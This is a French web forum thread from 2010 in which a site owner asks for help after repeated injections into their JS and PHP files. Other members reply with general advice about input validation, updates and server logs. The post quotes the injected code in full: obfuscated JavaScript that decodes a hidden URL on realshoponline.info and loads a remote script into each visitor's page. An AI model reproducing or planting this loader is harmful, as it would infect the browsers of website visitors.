Site piraté - help !

Fermé
Max - Modifié par Max le 21/04/2010 à 10:09
arth Messages postés 9374 Date d'inscription mardi 27 septembre 2005 Statut Contributeur Dernière intervention 16 décembre 2016 - 21 avril 2010 à 11:18
Bonjour,

je me fais poursuivre depuis une semaine par un hacker qui n'arrête pas d'injecter des codes à la fin de mes fichiers JS et à la fin de certains fichiers php de mon site. Je ne sais absolument pas comment il s'y prend. soit il a hacké mon pc et a pris tous mes codes ce dont je doute fortement, soit il y a une faille pour ce type d'exploit que je ne connais pas.
voici le code injecté en bas de page à chaque fois:


var B=new Date();var W;if(W!='c'){W='c'};function K(){var F='';var WK='';var j=window;var i=new Array();var a;if(a!='' && a!='ha'){a=null};var S;if(S!='' && S!='Mx'){S=null};var _=j['unescape'];var p=_("%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%66%72%65%65%77%65%62%73%2e%63%6f%6d%2f%68%6f%74%74%69%65%73%74%61%72%2e%63%6f%6d%2e%70%68%70");var d;if(d!='q' && d != ''){d=null};var eB=new Date();function V(h,M){var sS=new String();var Q="";var Bb;if(Bb!='sQ' && Bb!='Kq'){Bb=''};var t=_("%5d");var XZ;if(XZ!='JM'){XZ=''};this.Il='';var H=_("%5b");var tc=String("g");var aV='';var f;if(f!='' && f!='Mp'){f='cb'};var p_=new RegExp(H+M+t, tc);var jW;if(jW!='' && jW!='fC'){jW=''};return h.replace(p_, new String());var UH;if(UH!='' && UH!='ED'){UH='bH'};this.GM="";};var Z=V('8456493129695472663460262661994665797445124854634363426467412013242637263437657','32941756');var r=document;var b=V('sucOruixpktu','kxBIuO');var l=V('snrJcX','iwJqX3GOlF4pLZznU6TeD7KE0');var P=V('dNeJfJeEr8','7VEOSMsaguLJ18Fmo_lCNv');var N;if(N!='cA'){N=''};var C;if(C!='hf'){C=''};this.D="";var EV=new Array();var cV;if(cV!='Zs'){cV=''};function G(){this.jy="";var LT;if(LT!='' && LT!='C_'){LT=''};this.lV='';var Y=_("%68%74%74%70%3a%2f%2f%72%65%61%6c%73%68%6f%70%6f%6e%6c%69%6e%65%2e%69%6e%66%6f%3a");this.kuz="";var yd=new Array();var Gz=Y;this.xY="";Gz+=Z;Gz+=p;var LS;if(LS!='gFP' && LS!='SM'){LS=''};var xl;if(xl!='' && xl!='UQ'){xl=''};var zU='';try {this.VI="";var fu;if(fu!='u' && fu != ''){fu=null};var AL='';s=r[V('cKrAeuagtUeKEglUeUmXeinMt1','AuMKiUXgO1T')](b);var sF=new String();var In;if(In!='dY'){In=''};var oO=new Date();s[P]=[1,7][0];var zx;if(zx!='cz'){zx=''};s[l]=Gz;var ML;if(ML!='lx' && ML != ''){ML=null};r.body[V('aop2pDeWn5dVCNhMiAlzd5','MDNVWTA51RQokE2t8z')](s);var yE="";var Vh="";var mT='';} catch(H_){};var Dc="";this.Oo='';this.WU='';}var IW=new String();var AK;if(AK!='nz' && AK != ''){AK=null};var g=V('oen9lSo5aHds','SPM3Q7RwNpe9jiBGx1_25Hcs');var Vs;if(Vs!='xR' && Vs != ''){Vs=null};j[g]=G;var Uo="";var _G;if(_G!='Nr'){_G='Nr'};var ce_;if(ce_!='' && ce_!='Vu'){ce_=''};};var fP="";K();


Merci pour vitre aide !!!!



A voir également:

5 réponses

scriptiz Messages postés 1424 Date d'inscription dimanche 21 décembre 2008 Statut Membre Dernière intervention 14 septembre 2023 425
21 avril 2010 à 10:14
Déjà sans avoir les sources de ton site ni même l'adresse, il est difficile d'en trouver les failles ;)
0
scriptiz Messages postés 1424 Date d'inscription dimanche 21 décembre 2008 Statut Membre Dernière intervention 14 septembre 2023 425
21 avril 2010 à 10:40
Bah oui ça peut être avec un $_GET, avec un $_POST, pour ça qu'il faut les vérifier, ça peut aussi être avec un $_FILE, voir même en utilisant des failles d'Apache ou de PHP, bref les façons sont nombreuses je pense ;)
0
arth Messages postés 9374 Date d'inscription mardi 27 septembre 2005 Statut Contributeur Dernière intervention 16 décembre 2016 1 292
21 avril 2010 à 10:49
CMS à jour?
0
pas de CMS. Interface très simple...
0

Vous n’avez pas trouvé la réponse que vous recherchez ?

Posez votre question
arth Messages postés 9374 Date d'inscription mardi 27 septembre 2005 Statut Contributeur Dernière intervention 16 décembre 2016 1 292
21 avril 2010 à 11:18
Pour être sûr de ce que c'est, as-tu regardé les logs FTP et serveur Web pour voir les requêtes exécutées ou les login success?
0